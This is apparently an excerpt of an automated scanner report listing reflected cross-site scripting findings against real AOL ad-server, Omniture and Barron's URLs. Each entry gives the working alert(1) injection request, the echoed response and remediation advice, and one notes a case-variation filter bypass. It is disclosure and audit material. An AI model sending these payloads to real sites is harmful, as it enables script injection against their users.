Host: nai.adserverwc.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:28:13 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:28:13 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai1b887"-alert(1)-"3354bebcba6/daa.php?action_id=3&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName
...[SNIP]...

1.88. http://nai.adserverwc.adtechus.com/nai/daa.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adserverwc.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc109"-alert(1)-"1c14d276541 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai/daa.phpdc109"-alert(1)-"1c14d276541?action_id=3&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1
Host: nai.adserverwc.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:28:32 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:28:32 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
lamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.phpdc109"-alert(1)-"1c14d276541?action_id=3&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
...[SNIP]...

1.89. http://nai.adsonar.com/nai/daa.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adsonar.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eee26"-alert(1)-"5f399683112 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /naieee26"-alert(1)-"5f399683112/daa.php?action_id=3&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1
Host: nai.adsonar.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:28:01 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:28:01 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/naieee26"-alert(1)-"5f399683112/daa.php?action_id=3&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName
...[SNIP]...

1.90. http://nai.adsonar.com/nai/daa.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adsonar.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9c4d"-alert(1)-"4b274db9fdc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai/daa.phpd9c4d"-alert(1)-"4b274db9fdc?action_id=3&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1
Host: nai.adsonar.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:28:22 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:28:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
lamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.phpd9c4d"-alert(1)-"4b274db9fdc?action_id=3&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
...[SNIP]...

1.91. http://nai.adtech.de/nai/daa.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adtech.de
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21e7f"-alert(1)-"ff89196e097 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai21e7f"-alert(1)-"ff89196e097/daa.php?action_id=3&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1
Host: nai.adtech.de
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:28:10 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:28:10 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai21e7f"-alert(1)-"ff89196e097/daa.php?action_id=3&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName
...[SNIP]...

1.92. http://nai.adtech.de/nai/daa.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adtech.de
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a46a2"-alert(1)-"70ee2108da2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai/daa.phpa46a2"-alert(1)-"70ee2108da2?action_id=3&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1
Host: nai.adtech.de
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:28:29 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:28:29 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
lamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.phpa46a2"-alert(1)-"70ee2108da2?action_id=3&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
...[SNIP]...

1.93. http://nai.glb.adtechus.com/nai/daa.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3da81"-alert(1)-"46d128fdaa7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai3da81"-alert(1)-"46d128fdaa7/daa.php?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1
Host: nai.glb.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:28:11 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:28:11 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai3da81"-alert(1)-"46d128fdaa7/daa.php?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName
...[SNIP]...

1.94. http://nai.glb.adtechus.com/nai/daa.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab625"-alert(1)-"aa949ccf2f2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai/daa.phpab625"-alert(1)-"aa949ccf2f2?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1
Host: nai.glb.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:28:30 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:28:30 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
lamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.phpab625"-alert(1)-"aa949ccf2f2?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
...[SNIP]...

1.95. http://nai.tacoda.at.atwola.com/nai/daa.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.tacoda.at.atwola.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21de7"-alert(1)-"6a8ac96c613 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai21de7"-alert(1)-"6a8ac96c613/daa.php?action_id=3&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1
Host: nai.tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4E651C5B6E651A4418BD90FFF0000621; atdses=O

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:28:12 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:28:13 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai21de7"-alert(1)-"6a8ac96c613/daa.php?action_id=3&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName
...[SNIP]...

1.96. http://nai.tacoda.at.atwola.com/nai/daa.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.tacoda.at.atwola.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68e25"-alert(1)-"baa99d8e6dc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai/daa.php68e25"-alert(1)-"baa99d8e6dc?action_id=3&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1
Host: nai.tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4E651C5B6E651A4418BD90FFF0000621; atdses=O

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:28:31 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:28:31 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
lamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.php68e25"-alert(1)-"baa99d8e6dc?action_id=3&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
...[SNIP]...

1.97. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /m2/omnituremarketing/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 27cec<script>alert(1)</script>80cc05fcd82 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/omnituremarketing/mbox/standard?mboxHost=www.omniture.com&mboxSession=1315416403207-377852&mboxPC=1314743485378-299521.19&mboxPage=1315416403207-377852&screenHeight=1200&screenWidth=1920&browserWidth=1266&browserHeight=909&browserTimeOffset=-300&colorDepth=16&mboxCount=3&mbox=sidebar_global_phone27cec<script>alert(1)</script>80cc05fcd82&mboxId=0&mboxTime=1315398405840&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2Fprivacy%2F2o7&mboxReferrer=http%3A%2F%2Fallthingsd.com%2F20110906%2Fbring-in-the-suits-yahoo-hiring-strategic-advisers-to-plot-next-moves%2F%23&mboxVersion=40 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/privacy/2o7
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 142
Date: Wed, 07 Sep 2011 12:27:25 GMT
Server: Test & Target

mboxFactories.get('default').get('sidebar_global_phone27cec<script>alert(1)</script>80cc05fcd82',0).setOffer(new mboxOfferDefault()).loaded();

1.98. http://online.barrons.com/public/search/results.html [ARTICLESEARCHQUERY_PARSER parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://online.barrons.com
Path:   /public/search/results.html

Issue detail

The value of the ARTICLESEARCHQUERY_PARSER request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fa5e"><ScRiPt>alert(1)</ScRiPt>3426fe2fa5b was submitted in the ARTICLESEARCHQUERY_PARSER parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /public/search/results.html?KEYWORDS=%22MIRIAM%20GOTTFRIED%22&ARTICLESEARCHQUERY_PARSER=bylineOR4fa5e"><ScRiPt>alert(1)</ScRiPt>3426fe2fa5b HTTP/1.1
Host: online.barrons.com
Proxy-Connection: keep-alive
Referer: http://online.barrons.com/article/SB50001424052702304605504576554641342164236.html?mod=BOL_hpp_highlight_top
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=48b94c78-7a58-4a1e-88ea-6f536fd5118d; _chartbeat2=b0yv5wl9epl887ug; rsi_csl=; rsi_segs=; DJSESSION=BIZO%3Dbiz%3D1053%3B; Barrons_Community=; s_cc=true; s_sq=djglobal%2Cdjbarrons%3D%2526pid%253DBOL_Barron%252527s%252520Take_SB50001424052702304605504576554641342164236%2526pidt%253D1%2526oid%253Dhttp%25253A//online.barrons.com/public/search/results.html%25253FKEYWORDS%25253D%25252522MIRIAM%25252520GOTTFRIED%25252522%252526ARTICLESEARCH%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:36:16 GMT
